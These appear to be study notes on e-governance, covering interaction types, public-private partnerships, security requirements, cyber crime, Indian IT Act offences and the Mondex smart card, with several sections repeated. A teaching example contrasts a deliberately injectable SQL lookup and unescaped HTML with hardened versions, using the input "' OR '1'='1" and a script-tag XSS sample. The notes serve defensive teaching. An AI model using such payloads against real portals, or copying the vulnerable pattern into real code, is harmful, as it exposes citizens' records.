Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key security with Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through the internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment for businesses, enabling them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases the satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) – refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) – professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the provision of a public good or service by the latter
• Generally, but not always, involving:
  – Long-term contracts
  – User charges and/or payments flowing between the parties
  – Shared investments, but mainly private


  – Risk sharing by the parties
• Must be a partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal headroom
• As a way of financing the project
• Separate policy & regulation from operations


• Make the good or service available
• Pay for performance and output
• Introduce competition – for and in the market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps


• Crafting the partnership
• Implementing the partnership

Project Management –

Six Distinct Phases

Genesis
• What's the need?
• What's driving the need (the rationale)? Facility non-compliance, natural disaster, budget deficit
• Is there a need for a Public/Private Partnership?


Preliminary Project Definition

Feasibility
• Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market research
• Economic/financial analysis
• Program, budget and schedule
• Risk analysis

Plan and Test

Final project definition
• What is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
• Master schedule/budget
• Political climate
• Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
• How do you choose and contract with the best-value private partner?
• What's the best delivery method?
  o Design-Bid-Build
  o Design-Build
  o Finance-Design-Build
• What do current statutes allow?
• Procurement approach: sole source, RFP, low bid
• Risk allocation between public and private partners
• Structuring of contract: risks and rewards


Implement
• Environmental
• Design
• Permitting
• Construction
• Commissioning and administration

Operate
• Startup
• Monitoring
• Assessment
• Enhancement
• Contract modifications
• Contract renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure; a repository of electronic information on government laws and policies, including links to archived information and downloadable forms; and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index tend to also have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past


five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of the service.

2. INFORMATION SECURITY

A central challenge of e-Government services is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:
• understanding an organization's information security requirements and the need to establish a policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS, with continual improvement based on objective measurement.

Data security requires a set of security requirements:
• Authentication: the capability to identify who is using the services (a person or a software program); the process of verifying that you are who you say you are.
• Authorization: the capability to grant rights of access to resources; the process of verifying that someone has the rights to do what they are trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent unauthorized modification of information, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically relate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent a person or system that took part in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:
• Protecting premises, equipment and systems software, including input-output units


• Protecting software applications used to process personal data
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and of the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:
• achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• continually improve its control environment;
• effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found that 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. A SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained in cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.
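
The XSS and SQL injection findings above come down to two coding mistakes: building SQL out of strings, and echoing stored data into HTML without escaping it. As an added example (not from the cited research or any real portal), here is a citizen-record lookup for a G2C portal written both ways, against an in-memory SQLite table of constructed sample records; the table, columns and IDs are assumptions for the example.

```python
"""Added example, not code from the notes or from any government portal.
Shows the vulnerable and hardened forms of a citizen-record lookup."""
import html
import sqlite3

# Constructed sample records. The third name contains markup so that the
# output side can show what a stored XSS payload looks like once escaped.
SAMPLE_CITIZENS = [
    ("C001", "Asha Singh", "Bhopal"),
    ("C002", "Ravi Kumar", "Indore"),
    ("C003", "<script>alert('x')</script>", "Gwalior"),
]


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database loaded with the sample records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (cid TEXT PRIMARY KEY, name TEXT, district TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", SAMPLE_CITIZENS)
    return conn


def lookup_vulnerable(cid: str) -> list:
    """SQL built by string formatting: the citizen ID is parsed as SQL, not data,
    so a quote character in the input changes the query's WHERE clause."""
    conn = _connect()
    query = f"SELECT cid, name FROM citizens WHERE cid = '{cid}'"
    return conn.execute(query).fetchall()


def lookup_hardened(cid: str) -> list:
    """Bound parameter: the driver passes the ID as a value, so whatever it
    contains is compared against the column, never interpreted as SQL."""
    conn = _connect()
    return conn.execute("SELECT cid, name FROM citizens WHERE cid = ?", (cid,)).fetchall()


def render_vulnerable(name: str) -> str:
    """Echoes stored data straight into HTML: markup in the data becomes
    markup in the page, which is how stored XSS reaches other users."""
    return f"<td>{name}</td>"


def render_hardened(name: str) -> str:
    """Escapes on output, so stored data is displayed as text whatever it holds."""
    return f"<td>{html.escape(name, quote=True)}</td>"


def portal_row(cid: str) -> str:
    """The two hardened pieces used together, as a G2C page handler would."""
    rows = lookup_hardened(cid)
    if not rows:
        return "<td>no such record</td>"
    return render_hardened(rows[0][1])


if __name__ == "__main__":
    crafted = "' OR '1'='1"   # input that is a value to one version and SQL to the other
    print("vulnerable lookup returned", len(lookup_vulnerable(crafted)), "rows")
    print("hardened lookup returned", len(lookup_hardened(crafted)), "rows")
    print(render_vulnerable(SAMPLE_CITIZENS[2][1]))
    print(portal_row("C003"))
```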


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and it includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, threatening email, assuming someone's identity, sexual harassment, defamation, spam and phishing are some examples where computers are used to commit crime, whereas viruses, worms, industrial espionage, software piracy and hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking has witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base
• 121 million Internet users
• 65 million active Internet users, up by 28% from 51 million in 2010
• 50 million users shop online on e-commerce and online shopping sites
• 46+ million social network users
• 346 million mobile users had subscribed to data packages


CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with a fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:
• secures access;
• downloads, copies or extracts any data, computer database or any information;
• introduces or causes to be introduced any virus or contaminant;
• disrupts or causes disruption;
• denies or causes denial of access to any person;
• provides any assistance to any person to facilitate access;
• charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43
• Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A – Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:
• any information that is grossly offensive or has menacing character; or


• any information which he knows to be false, but, for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or
• any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C – Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D – Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E – Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years, or with fine not exceeding two lakh rupees, or with both."

S 67A – Punishment for publishing or transmitting material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits, or causes to be published or transmitted, in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C – Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated the 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force.
Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 – Hacking.
Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages.
Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers, because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption), under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

• Direct transfer of electronic money between two cards
• Transfer of electronic money over the Internet or telephone networks, etc.
• Keeps transaction records
• Password protection and "lock card" functions
• Portable balance finder to check balance
• Supports multiple currencies


ADVANTAGES

CONSUMER –
• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT –
• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION –
• Strengthened customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:

o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information


Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos, between applications (ITSEC 6 designation)
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks; Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of the limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.
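As an added illustration (not code from these notes or from Mondex itself), the following Python simulation models the offline card-to-card purse with a rolling ten-entry log described above and shows how records overwritten before an upload leave a gap in the bank's audit; the card ids, the amounts, the treatment of loads as online, and the bank's value-conservation check are all assumptions.

```python
"""Simulation of a Mondex-style offline purse with a rolling transaction log.

Added illustration only; not Mondex code or its real protocol. It models three
points from the notes: value moves card to card with no bank online, a card
keeps only its most recent transactions (a rolling ten), and records that roll
off before an ATM visit or retailer upload are lost to the bank's audit. Loads
are treated as online, so the bank records them at once. Card ids, amounts and
the value-conservation check are constructed assumptions.
"""
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Record:
    seq: int     # per-card sequence number, contiguous on the card
    peer: str    # the other party ("bank" for a load)
    amount: int  # minor units; negative when this card paid


class Card:
    LOG_CAPACITY = 10  # assumed from "rolling 10 transactions"

    def __init__(self, card_id, balance=0):
        self.card_id = card_id
        self.balance = balance
        self.seq = 0
        self.log = deque(maxlen=self.LOG_CAPACITY)  # oldest entry is overwritten

    def record(self, peer, amount):
        self.seq += 1
        rec = Record(self.seq, peer, amount)
        self.log.append(rec)
        return rec

    def pay(self, payee, amount):
        """Card-to-card transfer settled offline between the two chips."""
        if amount <= 0:
            raise ValueError("amount must be positive")
        if amount > self.balance:
            raise ValueError("insufficient value on card")  # only stored value is spendable
        self.balance -= amount
        payee.balance += amount
        self.record(payee.card_id, -amount)
        payee.record(self.card_id, amount)


class Bank:
    """Bank side: sees loads immediately, learns offline payments only on upload."""

    def __init__(self):
        self.issued = 0
        self.seen = {}  # card_id -> {seq: Record}

    def load(self, card, amount):
        card.balance += amount
        self.issued += amount
        rec = card.record("bank", amount)
        self.seen.setdefault(card.card_id, {})[rec.seq] = rec  # online, recorded now

    def upload(self, card):
        """Pull whatever the card still holds; return how many records are unrecoverable."""
        store = self.seen.setdefault(card.card_id, {})
        for rec in card.log:
            store[rec.seq] = rec
        missing = set(range(1, card.seq + 1)) - set(store)  # gaps = overwritten entries
        return len(missing)

    def value_conserved(self, cards):
        """Coarse fraud check: float held on cards must equal value the bank issued."""
        return sum(c.balance for c in cards) == self.issued


def run_scenario(payments=12, amount=100, upload_every=None):
    """Alice is loaded with 5000 and pays Bob `payments` times offline."""
    bank, alice, bob = Bank(), Card("alice"), Card("bob")
    bank.load(alice, 5000)
    for i in range(1, payments + 1):
        alice.pay(bob, amount)
        if upload_every and i % upload_every == 0:  # periodic ATM/retailer sync
            bank.upload(alice)
            bank.upload(bob)
    return {
        "alice": alice.balance,
        "bob": bob.balance,
        "lost_alice": bank.upload(alice),
        "lost_bob": bank.upload(bob),
        "value_conserved": bank.value_conserved([alice, bob]),
    }


if __name__ == "__main__":
    print(run_scenario())                # two payment records per card are gone
    print(run_scenario(upload_every=5))  # regular uploads keep the audit complete
```

The balance check still holds in both runs, which is why a conservation check alone cannot tell an honest overflow from tampering: only the per-transaction records distinguish them.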

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance, or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, and integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B) and government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally, four basic models are available: government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both terms are treated as the same; however, there is some difference between the two. E-government is the use of ICTs in public administration, combined with organizational change and new skills, to improve public services and democratic processes and to strengthen support to the public. The problem with taking this definition as a congruent definition of e-governance is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on the unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup, with the support of local processes and parameters, for governments to reach their citizens or end beneficiaries. Budgets for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government, and enhance citizens' economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE


A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department, or from anywhere, through the network. This is because of the characteristics of CORBA: it is a location-transparent, language-independent, implementation-independent and operating-system-independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit the CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services, like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as the Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with the Secure Sockets Layer (SSL) is popular with Internet-based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows:

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. a service centre, an unattended kiosk, or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B): refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G): professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and the completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

